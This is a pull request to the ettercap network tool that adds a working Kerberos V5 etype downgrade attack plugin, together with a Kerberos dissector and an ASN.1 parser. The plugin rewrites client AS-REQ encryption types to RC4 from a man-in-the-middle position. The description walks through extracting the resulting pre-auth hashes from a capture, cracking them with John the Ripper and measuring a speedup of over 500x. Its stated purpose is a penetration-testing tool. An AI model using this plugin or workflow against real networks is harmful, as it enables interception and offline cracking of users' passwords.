### PR TITLE
Implement etype downgrade attack on Kerberos V5

### DIFF
--- a/include/ec_asn1.h
+++ b/include/ec_asn1.h
@@ -1,0 +1,78 @@
+/*
+ * ASN.1 DER parsing
+ * Copyright (c) 2006, Jouni Malinen <j@w1.fi>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License version 2 as
+ * published by the Free Software Foundation.
+ *
+ * Alternatively, this software may be distributed under the terms of BSD
+ * license.
+ *
+ * See README and COPYING for more details.
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+
+#ifndef ETTERCAP_ASN1_H
+#define ETTERCAP_ASN1_H
+
+#define ASN1_TAG_EOC                0x00 /* not used with DER */
+#define ASN1_TAG_BOOLEAN            0x01
+#define ASN1_TAG_INTEGER            0x02
+#define ASN1_TAG_BITSTRING          0x03
+#define ASN1_TAG_OCTETSTRING        0x04
+#define ASN1_TAG_NULL               0x05
+#define ASN1_TAG_OID                0x06
+#define ASN1_TAG_OBJECT_DESCRIPTOR  0x07 /* not yet parsed */
+#define ASN1_TAG_EXTERNAL           0x08 /* not yet parsed */
+#define ASN1_TAG_REAL               0x09 /* not yet parsed */
+#define ASN1_TAG_ENUMERATED         0x0A /* not yet parsed */
+#define ASN1_TAG_UTF8STRING         0x0C /* not yet parsed */
+#define ANS1_TAG_RELATIVE_OID       0x0D
+#define ASN1_TAG_SEQUENCE           0x10 /* shall be constructed */
+#define ASN1_TAG_SET                0x11
+#define ASN1_TAG_NUMERICSTRING      0x12 /* not yet parsed */
+#define ASN1_TAG_PRINTABLESTRING    0x13
+#define ASN1_TAG_TG1STRING          0x14 /* not yet parsed */
+#define ASN1_TAG_VIDEOTEXSTRING     0x15 /* not yet parsed */
+#define ASN1_TAG_IA5STRING          0x16
+#define ASN1_TAG_UTCTIME            0x17
+#define ASN1_TAG_GENERALIZEDTIME    0x18 /* not yet parsed */
+#define ASN1_TAG_GRAPHICSTRING      0x19 /* not yet parsed */
+#define ASN1_TAG_VISIBLESTRING      0x1A
+#define ASN1_TAG_GENERALSTRING      0x1B /* not yet parsed */
+#define ASN1_TAG_UNIVERSALSTRING    0x1C /* not yet parsed */
+#define ASN1_TAG_BMPSTRING          0x1D /* not yet parsed */
+
+#define ASN1_CLASS_UNIVERSAL        0
+#define ASN1_CLASS_APPLICATION      1
+#define ASN1_CLASS_CONTEXT_SPECIFIC 2
+#define ASN1_CLASS_PRIVATE          3
+
+struct asn1_hdr {
+   uint8_t *payload;
+   uint8_t identifier, class, constructed;
+   unsigned int tag, length;
+};
+
+#define ASN1_MAX_OID_LEN 20
+struct asn1_oid {
+   unsigned long oid[ASN1_MAX_OID_LEN];
+   size_t len;
+};
+
+int asn1_get_next(uint8_t *buf, size_t len, struct asn1_hdr *hdr);
+int asn1_parse_oid(uint8_t *buf, size_t len, struct asn1_oid *oid);
+int asn1_get_oid(uint8_t *buf, size_t len, struct asn1_oid *oid,
+                 uint8_t **next);
+void asn1_oid_to_str(struct asn1_oid *oid, char *buf, size_t len);
+unsigned long asn1_bit_string_to_long(uint8_t *buf, size_t len);
+
+#endif /* ETTERCAP_ASN1_H */
+
+/* EOF */
+
+// vim:ts=3:expandtab

--- a/include/ec_hook.h
+++ b/include/ec_hook.h
@@ -58,6 +58,7 @@ enum {
    HOOK_PROTO_MDNS,
    HOOK_PROTO_NBNS,
    HOOK_PROTO_HTTP,
+   HOOK_PROTO_KRB5
 };
 
 EC_API_EXTERN void hook_add(int point, void (*func)(struct packet_object *po) );

--- a/man/ettercap_plugins.8.in
+++ b/man/ettercap_plugins.8.in
@@ -302,6 +302,14 @@ ettercap \-TP isolate /192.168.0.1/ /192.168.0.2\-30/
 
 
 .TP
+.B krb5_downgrade
+.Sp
+It downgrades Kerberos V5 security by modifying the etype values in client
+AS-REQ packets. This way, obtained hashes can be easily cracked by John the
+Ripper (JtR). You have to be in the "middle" of the connection to successfully
+use it. It hooks the kerberos dissector, so you have to keep it active.
+
+.TP
 .B link_type
 .Sp
 It performs a check of the link type (hub or switch) by sending a spoofed ARP

--- a/plug-ins/CMakeLists.txt
+++ b/plug-ins/CMakeLists.txt
@@ -49,6 +49,7 @@ scan_poisoner
 search_promisc
 smb_clear
 smb_down
+krb5_downgrade
 smurf_attack
 stp_mangler)
 

--- a/plug-ins/krb5_downgrade/krb5_downgrade.c
+++ b/plug-ins/krb5_downgrade/krb5_downgrade.c
@@ -1,0 +1,216 @@
+/*
+    krb5_downgrade -- ettercap plugin - Downgrades Kerberos V5 security by
+    modifying AS-REQ packets
+
+    Copyright (C) Dhiru Kholia (dhiru at openwall.com)
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
+
+    This file borrows boilerplate code from the smb_down plugin.
+ */
+
+#include <ec.h>
+#include <ec_plugins.h>
+#include <ec_packet.h>
+#include <ec_hook.h>
+#include <ec_asn1.h>
+
+/* https://cwiki.apache.org/confluence/display/DIRxASN1/Kerberos
+
+   KDC-REQ         ::= SEQUENCE {
+        -- NOTE: first tag is [1], not [0]
+        pvno            [1] INTEGER (5) ,
+        msg-type        [2] INTEGER (10 -- AS -- | 12 -- TGS --),
+        padata          [3] SEQUENCE OF PA-DATA OPTIONAL
+                            -- NOTE: not empty --,
+        req-body        [4] KDC-REQ-BODY
+   }
+
+   KDC-REQ-BODY    ::= SEQUENCE {
+        kdc-options             [0] KDCOptions,
+        cname                   [1] PrincipalName OPTIONAL
+                                    -- Used only in AS-REQ --,
+        realm                   [2] Realm
+                                    -- Server's realm
+                                    -- Also client's in AS-REQ --,
+        sname                   [3] PrincipalName OPTIONAL,
+        from                    [4] KerberosTime OPTIONAL,
+        till                    [5] KerberosTime,
+        rtime                   [6] KerberosTime OPTIONAL,
+        nonce                   [7] UInt32,
+        etype                   [8] SEQUENCE OF Int32 -- EncryptionType
+                                    -- in preference order --,
+        addresses               [9] HostAddresses OPTIONAL,
+        enc-authorization-data  [10] EncryptedData OPTIONAL
+                                    -- AuthorizationData --,
+        additional-tickets      [11] SEQUENCE OF Ticket OPTIONAL
+                                        -- NOTE: not empty
+   }
+
+   AS-REQ          ::= [APPLICATION 10] KDC-REQ */
+
+/* protos */
+int plugin_load(void *);
+static int krb5_downgrade_init(void *);
+static int krb5_downgrade_fini(void *);
+
+static void parse_krb5(struct packet_object *po);
+
+/* plugin operations */
+
+struct plugin_ops krb5_downgrade_ops = {
+   /* ettercap version MUST be the global EC_VERSION */
+   .ettercap_version = EC_VERSION,
+   /* the name of the plugin */
+   .name = "krb5_downgrade",
+   /* a short description of the plugin */
+   .info = "Downgrades Kerberos V5 security by modifying AS-REQ packets",
+   /* the plugin version. */
+   .version = "1.0",
+   /* activation function */
+   .init = &krb5_downgrade_init,
+   /* deactivation function */
+   .fini = &krb5_downgrade_fini,
+};
+
+int plugin_load(void *handle)
+{
+   return plugin_register(handle, &krb5_downgrade_ops);
+}
+
+static int krb5_downgrade_init(void *dummy)
+{
+   /* variable not used */
+   (void)dummy;
+
+   /* It doesn't work if unoffensive */
+   if (GBL_OPTIONS->unoffensive) {
+      INSTANT_USER_MSG("krb5_downgrade: plugin doesn't work in UNOFFENSIVE mode\n");
+      return PLUGIN_FINISHED;
+   }
+
+   USER_MSG("krb5_downgrade: plugin running...\n");
+
+   hook_add(HOOK_PROTO_KRB5, &parse_krb5);
+   return PLUGIN_RUNNING;
+}
+
+static int krb5_downgrade_fini(void *dummy)
+{
+   /* variable not used */
+   (void)dummy;
+
+   USER_MSG("krb5_downgrade: plugin terminated...\n");
+
+   hook_del(HOOK_PROTO_KRB5, &parse_krb5);
+   return PLUGIN_FINISHED;
+}
+
+/* Downgrade the "etype" values present in AS-REQ request */
+static void parse_krb5(struct packet_object *po)
+{
+   u_char *ptr;
+   ptr = po->DATA.data;
+   struct asn1_hdr hdr;
+   size_t length = po->DATA.len;
+   size_t size, netypes, i;
+   uint8_t *pos, *end;
+   int ret;
+   int found = 0;
+   char tmp[MAX_ASCII_ADDR_LEN];
+
+   pos = ptr;
+   // APPLICATION 10, look for AS-REQ packets
+   if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) {
+      // Hack to skip over "Record Mark"
+      pos = pos + 4;
+      if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) {
+         return;
+      }
+   }
+   pos = hdr.payload;
+   end = pos + hdr.length;
+
+   if (end > pos + length)
+      return;
+
+   // KDC-REQ SEQUENCE
+   if (asn1_get_next(pos, end - pos, &hdr) < 0 || hdr.class != ASN1_CLASS_UNIVERSAL || hdr.tag != ASN1_TAG_SEQUENCE) {
+      return;
+   }
+   pos = hdr.payload;
+
+   // Locate KDC-REQ-BODY (class = 2, tag = 4)
+   while (1) {
+      if (end <= pos)
+         return;
+      ret = asn1_get_next(pos, end - pos, &hdr);
+      if (ret < 0)
+         return;
+      if (hdr.class == 2 && hdr.tag == 4) {
+         found = 1;
+         break;
+      }
+      pos = hdr.payload + hdr.length;
+   }
+   if (!found)
+      return;
+
+   // KDC-REQ-BODY SEQUENCE
+   pos = hdr.payload;
+   ret = asn1_get_next(pos, end - pos, &hdr);
+   pos = hdr.payload;
+
+   // Locate etype (class = 2, tag = 8)
+   found = 0;
+   while (1) {
+      if (end <= pos)
+         return;
+      ret = asn1_get_next(pos, end - pos, &hdr);
+      if (ret < 0)
+         return;
+      if (hdr.class == 2 && hdr.tag == 8) {
+         found = 1;
+         break;
+      }
+      pos = hdr.payload + hdr.length;
+   }
+   if (!found)
+      return;
+
+   // SEQUENCE OF Int32 -- EncryptionType -- in preference order --
+   pos = hdr.payload;
+   size = pos[1];
+   netypes = pos[1] / 3;
+   if (pos + size > ptr + length)
+      return;
+
+   // Sample etype records -> 02 01 12, 02 01 11, 02 01 10, 02 01 17.
+   // Downgrade the etypes to etype 23.
+   pos = pos + 2; // pointing to first etype record
+   for (i = 0; i < netypes; i++) {
+      pos[2] = '\x17';
+      pos = pos + 3;
+      po->flags |= PO_MODIFIED;
+   }
+   if (po->flags & PO_MODIFIED) {
+      USER_MSG("krb5_downgrade: Downgraded etypes in AS-REQ message, %s -> ", ip_addr_ntoa(&po->L3.src, tmp));
+      USER_MSG("%s\n", ip_addr_ntoa(&po->L3.dst, tmp));
+   }
+}
+
+/* EOF */
+
+// vim:ts=3:expandtab

--- a/src/CMakeLists.txt
+++ b/src/CMakeLists.txt
@@ -1,5 +1,6 @@
 set(EC_SRC
-	ec_mem.c
+        ec_asn1.c
+        ec_mem.c
         ec_capture.c
         ec_checksum.c
         ec_conf.c
@@ -62,6 +63,7 @@ set(EC_SRC
         dissectors/ec_imap.c
         dissectors/ec_irc.c
         dissectors/ec_iscsi.c
+        dissectors/ec_kerberos.c
         dissectors/ec_ldap.c
         dissectors/ec_mdns.c
         dissectors/ec_mongodb.c

--- a/src/dissectors/ec_kerberos.c
+++ b/src/dissectors/ec_kerberos.c
@@ -1,0 +1,123 @@
+/*
+    ettercap -- dissector for Kerberos v5 - TCP 88 / UDP 88
+
+    Copyright (C) Dhiru Kholia (dhiru at openwall.com)
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
+
+ */
+
+#include <ec.h>
+#include <ec_decode.h>
+#include <ec_dissect.h>
+#include <ec_session.h>
+#include <ec_asn1.h>
+
+/* protos */
+
+FUNC_DECODER(dissector_kerberos);
+void kerberos_init(void);
+
+void __init kerberos_init(void)
+{
+   dissect_add("kerberosu", APP_LAYER_UDP, 88, dissector_kerberos);
+   dissect_add("kerberost", APP_LAYER_TCP, 88, dissector_kerberos);
+}
+
+/* https://cwiki.apache.org/confluence/display/DIRxASN1/Kerberos
+
+   KDC-REQ         ::= SEQUENCE {
+        -- NOTE: first tag is [1], not [0]
+        pvno            [1] INTEGER (5) ,
+        msg-type        [2] INTEGER (10 -- AS -- | 12 -- TGS --),
+        padata          [3] SEQUENCE OF PA-DATA OPTIONAL
+                            -- NOTE: not empty --,
+        req-body        [4] KDC-REQ-BODY
+   }
+
+   KDC-REQ-BODY    ::= SEQUENCE {
+        kdc-options             [0] KDCOptions,
+        cname                   [1] PrincipalName OPTIONAL
+                                    -- Used only in AS-REQ --,
+        realm                   [2] Realm
+                                    -- Server's realm
+                                    -- Also client's in AS-REQ --,
+        sname                   [3] PrincipalName OPTIONAL,
+        from                    [4] KerberosTime OPTIONAL,
+        till                    [5] KerberosTime,
+        rtime                   [6] KerberosTime OPTIONAL,
+        nonce                   [7] UInt32,
+        etype                   [8] SEQUENCE OF Int32 -- EncryptionType
+                                    -- in preference order --,
+        addresses               [9] HostAddresses OPTIONAL,
+        enc-authorization-data  [10] EncryptedData OPTIONAL
+                                    -- AuthorizationData --,
+        additional-tickets      [11] SEQUENCE OF Ticket OPTIONAL
+                                        -- NOTE: not empty
+   }
+
+   AS-REQ          ::= [APPLICATION 10] KDC-REQ */
+
+FUNC_DECODER(dissector_kerberos)
+{
+   u_char *ptr;
+   ptr = PACKET->DATA.data;
+   struct asn1_hdr hdr;
+   size_t length = PACKET->DATA.len;
+   u_char *pos, *end;
+
+   /* don't complain about unused var */
+   (void)DECODE_DATA;
+   (void)DECODE_DATALEN;
+   (void)DECODED_LEN;
+
+   if (length < 4)
+      return NULL;
+
+   /* Check for initial AS-REQ packet */
+   if (FROM_CLIENT("kerberosu", PACKET) || FROM_CLIENT("kerberost", PACKET)) {
+      pos = ptr;
+
+      // APPLICATION 10
+      if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) {
+         // Hack to skip over "Record Mark"
+         pos = pos + 4;
+         if (asn1_get_next(pos, length, &hdr) < 0 || hdr.class != ASN1_CLASS_APPLICATION || hdr.tag != 10) {
+            return NULL;
+         }
+      }
+      pos = hdr.payload;
+      end = pos + hdr.length;
+      if (end > pos + PACKET->DATA.len)
+         return NULL;
+      // KDC-REQ SEQUENCE
+      if (asn1_get_next(pos, end - pos, &hdr) < 0 || hdr.class != ASN1_CLASS_UNIVERSAL || hdr.tag != ASN1_TAG_SEQUENCE) {
+         return NULL;
+      }
+      pos = hdr.payload;
+
+      // Seems like an AS-REQ message
+      hook_point(HOOK_PROTO_KRB5, PACKET);
+   } else {
+      // KDC to client packet. BUG: if packet is modified here, then
+      // we get invalid UDP checksums on the client side!
+   }
+
+   return NULL;
+}
+
+/* EOF */
+
+// vim:ts=3:expandtab

--- a/src/ec_asn1.c
+++ b/src/ec_asn1.c
@@ -1,0 +1,210 @@
+/*
+ * ASN.1 DER parsing
+ * Copyright (c) 2006, Jouni Malinen <j@w1.fi>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License version 2 as
+ * published by the Free Software Foundation.
+ *
+ * Alternatively, this software may be distributed under the terms of BSD
+ * license.
+ *
+ * See README and COPYING for more details.
+ */
+
+#include <ec.h>
+#include <ec_asn1.h>
+
+int asn1_get_next(uint8_t *buf, size_t len, struct asn1_hdr *hdr)
+{
+   uint8_t *pos, *end;
+   uint8_t tmp;
+
+   memset(hdr, 0, sizeof(*hdr));
+   pos = buf;
+   end = buf + len;
+
+   hdr->identifier = *pos++;
+   hdr->class = hdr->identifier >> 6;
+   hdr->constructed = !!(hdr->identifier & (1 << 5));
+
+   if ((hdr->identifier & 0x1f) == 0x1f) {
+      hdr->tag = 0;
+      do {
+         if (pos >= end) {
+            DEBUG_MSG("ASN.1: Identifier "
+                      "underflow");
+            return -1;
+         }
+         tmp = *pos++;
+         DEBUG_MSG("ASN.1: Extended tag data: "
+                   "0x%02x", tmp);
+         hdr->tag = (hdr->tag << 7) | (tmp & 0x7f);
+      } while (tmp & 0x80);
+   } else
+      hdr->tag = hdr->identifier & 0x1f;
+
+   tmp = *pos++;
+   if (tmp & 0x80) {
+      if (tmp == 0xff) {
+         DEBUG_MSG("ASN.1: Reserved length "
+                   "value 0xff used");
+         return -1;
+      }
+      tmp &= 0x7f;   /* number of subsequent octets */
+      hdr->length = 0;
+      if (tmp > 4) {
+         DEBUG_MSG("ASN.1: Too long length field");
+         return -1;
+      }
+      while (tmp--) {
+         if (pos >= end) {
+            DEBUG_MSG("ASN.1: Length "
+                      "underflow");
+            return -1;
+         }
+         hdr->length = (hdr->length << 8) | *pos++;
+      }
+   } else {
+      /* Short form - length 0..127 in one octet */
+      hdr->length = tmp;
+   }
+
+   if (end < pos || hdr->length > (unsigned int)(end - pos)) {
+      DEBUG_MSG("ASN.1: Contents underflow");
+      return -1;
+   }
+
+   hdr->payload = pos;
+   return 0;
+}
+
+int asn1_parse_oid(uint8_t *buf, size_t len, struct asn1_oid *oid)
+{
+   uint8_t *pos, *end;
+   unsigned long val;
+   uint8_t tmp;
+
+   memset(oid, 0, sizeof(*oid));
+
+   pos = buf;
+   end = buf + len;
+
+   while (pos < end) {
+      val = 0;
+
+      do {
+         if (pos >= end)
+            return -1;
+         tmp = *pos++;
+         val = (val << 7) | (tmp & 0x7f);
+      } while (tmp & 0x80);
+
+      if (oid->len >= ASN1_MAX_OID_LEN) {
+         DEBUG_MSG("ASN.1: Too long OID value");
+         return -1;
+      }
+      if (oid->len == 0) {
+         /*
+          * The first octet encodes the first two object
+          * identifier components in (X*40) + Y formula.
+          * X = 0..2.
+          */
+         oid->oid[0] = val / 40;
+         if (oid->oid[0] > 2)
+            oid->oid[0] = 2;
+         oid->oid[1] = val - oid->oid[0] * 40;
+         oid->len = 2;
+      } else
+         oid->oid[oid->len++] = val;
+   }
+
+   return 0;
+}
+
+int asn1_get_oid(uint8_t *buf, size_t len, struct asn1_oid *oid,
+                 uint8_t **next)
+{
+   struct asn1_hdr hdr;
+
+   if (asn1_get_next(buf, len, &hdr) < 0 || hdr.length == 0)
+      return -1;
+
+   if (hdr.class != ASN1_CLASS_UNIVERSAL || hdr.tag != ASN1_TAG_OID) {
+      DEBUG_MSG("ASN.1: Expected OID - found class %d "
+                "tag 0x%x", hdr.class, hdr.tag);
+      return -1;
+   }
+
+   *next = hdr.payload + hdr.length;
+
+   return asn1_parse_oid(hdr.payload, hdr.length, oid);
+}
+
+void asn1_oid_to_str(struct asn1_oid *oid, char *buf, size_t len)
+{
+   char *pos = buf;
+   size_t i;
+   int ret;
+
+   if (len == 0)
+      return;
+
+   buf[0] = '\0';
+
+   for (i = 0; i < oid->len; i++) {
+      ret = snprintf(pos, buf + len - pos,
+                        "%s%lu",
+                        i == 0 ? "" : ".", oid->oid[i]);
+      if (ret < 0 || ret >= buf + len - pos)
+         break;
+      pos += ret;
+   }
+   buf[len - 1] = '\0';
+}
+
+static uint8_t rotate_bits(uint8_t octet)
+{
+   int i;
+   uint8_t res;
+
+   res = 0;
+   for (i = 0; i < 8; i++) {
+      res <<= 1;
+      if (octet & 1)
+         res |= 1;
+      octet >>= 1;
+   }
+
+   return res;
+}
+
+unsigned long asn1_bit_string_to_long(uint8_t *buf, size_t len)
+{
+   unsigned long val = 0;
+   uint8_t *pos = buf;
+
+   /* BER requires that unused bits are zero, so we can ignore the number
+    * of unused bits */
+   pos++;
+
+   if (len >= 2)
+      val |= rotate_bits(*pos++);
+   if (len >= 3)
+      val |= ((unsigned long)rotate_bits(*pos++)) << 8;
+   if (len >= 4)
+      val |= ((unsigned long)rotate_bits(*pos++)) << 16;
+   if (len >= 5)
+      val |= ((unsigned long)rotate_bits(*pos++)) << 24;
+   if (len >= 6) {
+      DEBUG_MSG("X509: %s - some bits ignored "
+                "(BIT STRING length %lu)",
+                __FUNCTION__, (unsigned long)len);
+   }
+
+   return val;
+}
+
+/* EOF */
+
+// vim:ts=3:expandtab


### PR DESCRIPTION
The `krb5_down` plugin downgrades the `etype` values found in Kerberos V5 AS-REQ messages.

By doing such attacks on Kerberos V5 protocol, it becomes easier to conduct offline password brute-forcing attacks.

![krb_down-2](https://user-images.githubusercontent.com/79528/29926894-4ff37a2a-8e82-11e7-8d80-0406113301de.png)

This is a screenshot of a slightly older version of the code.

[KRB5-MitM-krb5_down-openwall.zip (pcap)](https://github.com/Ettercap/ettercap/files/1267268/KRB5-MitM-krb5_down-openwall.zip) has one regular kinit request, and one downgraded kinit request. This request downgrade attack was done by using the `krb5_down` plugin.

Wireshark screenshot of original etypes in the unmodified kinit request,

![original-etypes](https://user-images.githubusercontent.com/79528/29954575-8a8fa45a-8ef6-11e7-830b-53fb2ee6cb37.png)

Wireshark screenshot of downgraded etypes in the modified kinit request,

![downgraded-etypes](https://user-images.githubusercontent.com/79528/29954588-a567b574-8ef6-11e7-8536-63885aa843ce.png)

Let's extract hashes from this .pcap file.

```
$ tshark -2 -r KRB5-MitM-krb5_down-openwall.pcap -R "tcp.dstport==88 or udp.dstport==88" -T pdml > data.pdml

$ ./krbpa2john.py data.pdml > hashes  # from JtR jumbo

$ cat hashes
lulu:$krb5pa$18$lulu$EXAMPLE.COM$$1d2dac64d298f7243324f3f4636ae2cebcf0cd61db3f2138991064709e9f0aaba13101bd28dcce534828815f37bdd22c7e44b97b301a6dfe
lulu:$krb5pa$23$lulu$EXAMPLE.COM$$6f7d7eab63dd2500f80d11aaa617de2c76b993f7e9c28b4a7640fb70651cc47b588e4bcf209685fd04e06eb4d7674b5430719098
```

The first kinit request uses a strong etype value of 18, and the second downgraded kinit request uses a weaker etype value of 23. The hashes listed above also have the etype value present in them.

Let's crack the hashes using JtR jumbo,

```
$ ../run/john hashes -wordlist=wordlist
openwall         (lulu)

$ ../run/john --format=krb5pa-md5 hashes -wordlist=wordlist
openwall         (lulu)

$ cat ../run/john.pot 
$krb5pa$18$lulu$EXAMPLE.COM$EXAMPLE.COMlulu$1d2dac64d298f7243324f3f4636ae2cebcf0cd61db3f2138991064709e9f0aaba13101bd28dcce534828815f37bdd22c7e44b97b301a6dfe:openwall
$krb5pa$23$$$$6f7d7eab63dd2500f80d11aaa617de2c76b993f7e9c28b4a7640fb70651cc47b588e4bcf209685fd04e06eb4d7674b5430719098:openwall
```

Notice the speed difference between cracking these hashes of two different etype values.

```
$ ../run/john --test --format=krb5pa-sha1  # i7-6600U
Will run 4 OpenMP threads
Benchmarking: krb5pa-sha1, Kerberos 5 AS-REQ Pre-Auth etype 17/18 [PBKDF2-SHA1 256/256 AVX2 8x]... (4xOMP) DONE
Raw:	5485 c/s real, 1412 c/s virtual
```

```
$ ../run/john --test --format=krb5pa-md5
Will run 4 OpenMP threads
Benchmarking: krb5pa-md5, Kerberos 5 AS-REQ Pre-Auth etype 23 [32/64]... (4xOMP) DONE
Many salts:	2985K c/s real, 783722 c/s virtual
Only one salt:	1531K c/s real, 396866 c/s virtual
```

By downgrading the etype value from 18 to 23 by using the krb5_down plugin, an attacker can gain a speed-up of > 500x while cracking the "hashes" offline.

Note: krb5 releases 1.8 and later disable the single-DES enctypes by default. Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default (https://web.mit.edu/kerberos/krb5-latest/doc/admin/enctypes.html).

While I had the the initial proof-of-concept code working in year 2012, the code was quite bad to send a pull request. Hopefully, this code version is better ;)

I have not fuzz tested this code yet. So please review the code carefully.